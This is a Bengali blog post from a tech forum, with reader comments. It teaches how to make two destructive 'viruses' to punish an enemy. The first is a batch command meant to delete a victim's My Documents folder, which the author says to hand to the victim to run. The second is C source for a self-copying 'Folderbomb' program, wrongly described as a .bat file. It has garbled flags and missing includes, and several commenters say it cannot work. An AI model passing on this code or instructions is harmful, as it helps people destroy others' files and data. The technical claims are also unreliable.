C Drive এ ভাইরাস বানান (শত্রুকে ঘায়েল করার সহজ উপায়)

এই টিউনটি শুধুমাএ শেখার জন্য । তাই কেউ এই টিউনের অপব্যবহার করবেন না ।
কেউ করলে আমি দায়ী নই ।

এই টিউনে শেখানো হবে কীভাবে C drive(system drive) এ ভাইরাস তৈরী করে শত্রুকে শায়েস্তা করা যায় । এই টিউনে আপনাদের দুটি ভাইরাস তৈরী করা শেখাবো ।
আসেলে এটি মূলত এক ধরণের BATCH ফাইল । বিভিন্ন রকম কোড ব্যবহার আমরা এই ধরণের BATCH ফাইল তৈরী করতে পারি ।
আসেন শুরু করি ।

ভাইরাস কোড ০১:
এটি খুব ই ছোট একটি কোড । এটি ভিকটিমের my documents ফোল্ডার ডিলিট করে দিবে ।

*.প্রথমে নোটপ্যাড ওপেন করুন ।
*. নিচের কোডটি কপি করে নোটপ্যাডে নিন
rmdir C:\Documents and Settings \S\Q.

*.এবার এটিকে .bat এই format এ যেকোনো নাম দিয়ে সেভ করুন ।

যেমন: virus.bat

*. এবার এটি আপনার ভিকটিমের পিসিতে দিয়ে দিন । আর ভিকটিম যখন এটিতে ক্লিক করবে তখন আরকি my documents folder উধাও ।

মুক্তি পাবেন যেভাবে :

*. My documents folder টি ফেরত পেতে চাইলে কষ্ট করে আবার সিস্টেম ইনস্টল করুন ।

ভাইরাস কোড ০২:

এই পদ্ধতিটা একটু জটিল খেয়াল রাখবেন কোথায় যেনো কিছু ভুল না হয় ।

আসুন দেখে নেই এই ভাইরাসেয় কার্যকারতি ।
এটি তৈরী করবে

 

ফোল্ডার অসংখ্যা ফোল্ডার । সারা HARD DISK এ তৈরী হবে হাজার হাজার ফোল্ডার । ভিকটিমের এক একটি ফোল্ডারের ফাইল ছড়িয়ে পড়বে এই সব ফোল্ডারে । সব এলোমেলো হয়ে যাবে ।

*.notepad ওপেন করুন এবং নিচের কোডটি কপি করে নিন ।

#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan([email protected])\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)

write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}

*. .bat format এ পছন্দ মতো নাম দিয়ে সেভ করুন ।

*. আগের মতোই যখন এটাতে ক্লিক করা হবে আর তখন ই শুরু হবে ফোল্ডার বিস্ফোরণ 😛

মুক্তির উপায় :

*. Hard disk টি সম্পূর্ণ ফরমেট করে নতুনভাবে সিস্টাম ইনস্টল করতে হবে । (শত্রুর সব শেষ)

ভালো থাকবেন । আর আমার টিউনগুলো কেমন হচ্ছে জানাতে ভুলবেন না ।

Level 0

আমি ইমরান হোসেন নয়ন। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 13 বছর 1 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 5 টি টিউন ও 28 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 0 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।

আমি ইমরান । ইন্টারমিডিয়েট ২য় বর্ষের বাণিজ্য বিভাগের ছাএ । নতুন নতুন প্রযুক্তির সাথে নিজেকে আপডেট রাখতে খুব ভালো লাগে । আমি ভালবাসি শিখতে এবং শেখাতে । শেখাতে চাই সৃজনশীল কিছু । আছি ফেইসবুকে ভালো লাগলে আমাকে রিকোয়েস্ট পাঠাবেন । http://www.facebook.com/ihn.imran


টিউনস


আরও টিউনস


টিউনারের আরও টিউনস


টিউমেন্টস

thanks vai ei rokom akta tune korar jonno

ভাল Tune!!

আপনাকেও ধন্যবাদ:-)

Level 0

Jotil

ভয় পাইলাম 🙁

যদি মাইডকুমেন্ট অন্য কোন ড্রাইভে থাকে তবে কি কোড টা কাজ করবে?

Level 2

ভাল লাগল।

Level 0

haha. but problem হইল টেস্ট করার সাহস হচ্ছে না :/

ভাল লাগল। ভাই পরের ক্ষতি না করার জন্য শেষে অনুরোধ করেন?

Level 0

ha khov balo tobe ame techtunes a new tai base kiso jane na ame janta chai j bangla comment
korbo ki babe? plzzzz janaben

bro….আপনি এটি কী language use করে লিখেছেন । অর্থ্যাৎ আমি বলতে চাচ্ছি যে Notepad এ আমরা যেসব কাজ hacking কিংবা অন্যান্য কোন effect তৈরির জন্য করে থাকি তা বিস্তারিত শিখার উপায় কী । যার ফলে Code গুলো আমি আমার ইচ্ছেমত ব্যবহার করতে পারি ।

    @MD. Akter Hossain: এটা হল MS-DOS/Batch Programming. সরাসরি প্রোগ্রামিং ভাষা না বলে একে Script বলা ভাল।
    আর ২য় কোডটি ভুল, কেন ভুল তা যদি পরিষ্কার হতে চান তাহলে পরের কমেন্ট পড়ুন।

মোটেও ভাল লাগল না। কারন আপনি ভুল করেছেন। এরকম করে কমেন্ট করা আসলে উচিত নয়, কিন্তু ভুল তো শুধরে দিতেই হবে নাকি?
আপনি ২য় যে কোড দিয়েছেন সেটা হল C++, বিষয়টি বোধহয় আপনি জানেন না- .bat এক্সটেনশনে C++ কোড সেভ করলে কখনোই কাজ করবে না। যদি কাজ করত, তাহলে C++ কোড কম্পাইল করার জন্য ৫০-৬০ মেগাবাইটের সফটওয়্যার লাগত না।
যাই হোক, আপনি দেখেছেন এখানে include কথাটি আছে। এটি হল লাইব্রেরি এবং লাইব্রেরির সব জিনিস নির্দিষ্ট C++ Compiling Software এর মধ্যে থাকে। প্রত্যেকটা প্রোগ্রামিং এর আলাদা কম্পাইলার আছে।
.bat হল শুধু Batch ফাইলের এক্সটেনশন। বিষয়টি স্বীকার করে নিলে খুশি হব।

    Level 0

    @আহমেদ সাদমান: ভাইয়া C এবং C++ আলাদা ভাবে চেনার উপায় কি ?
    আর যদি কোন উপায় না থাকে তাহলে আপনি কিভাবে বুজলেন এগুল C++ এর কোড ।

      @sbn5233: কমেন্ট শুরুর আগে একটা কথা বলি, C বা C++ বা কোন ভাষাই এ পদ্ধতিতে (.bat) কাজ করবে না। উপরোক্ত কোডটি C (দুখিত, আমি পূর্ববর্তী কমেন্টে এটাকে C++ বলেছি)।
      এখন বলি চেনার উপায়। C তে কনসোল আউটপুটের জন্য ব্যবহৃত হয় printf/cprintf, আর C++ এ এই কাজটির জন্য ব্যবহৃত্ হয় “cout” (console output). উপরে printf ব্যবহৃত হয়েছে বিধায় এটা C. এছাড়াও কিছু হেডার ফাইলের অমিল আছে (#include).
      আমি C++ শিখছি, তাই C সম্পর্কে বিস্তারিত বলতে পারব না। যারা C বা C++ জানে – তারা কোড দেখেই বলে দিতে পারবে এটা C নাকি C++.

Level 0

ai virasti kothay rakle computer ar hard disk format hobe?

Konotai Kaj Kore Na. VOA and Minus.

অনেক ধন্যবাদ।

ধন্যবাদ

Level 0

ভাই, দয়া করে কিছু ভাল জিনিস শেয়ার করেন…………আর একজনের কম্পিউটার ক্ষতির করার পদ্ধতি শিখান আবার বলেন “এই টিউনের অপব্যবহার করবেন না ।
কেউ করলে আমি দায়ী নই”

জটিল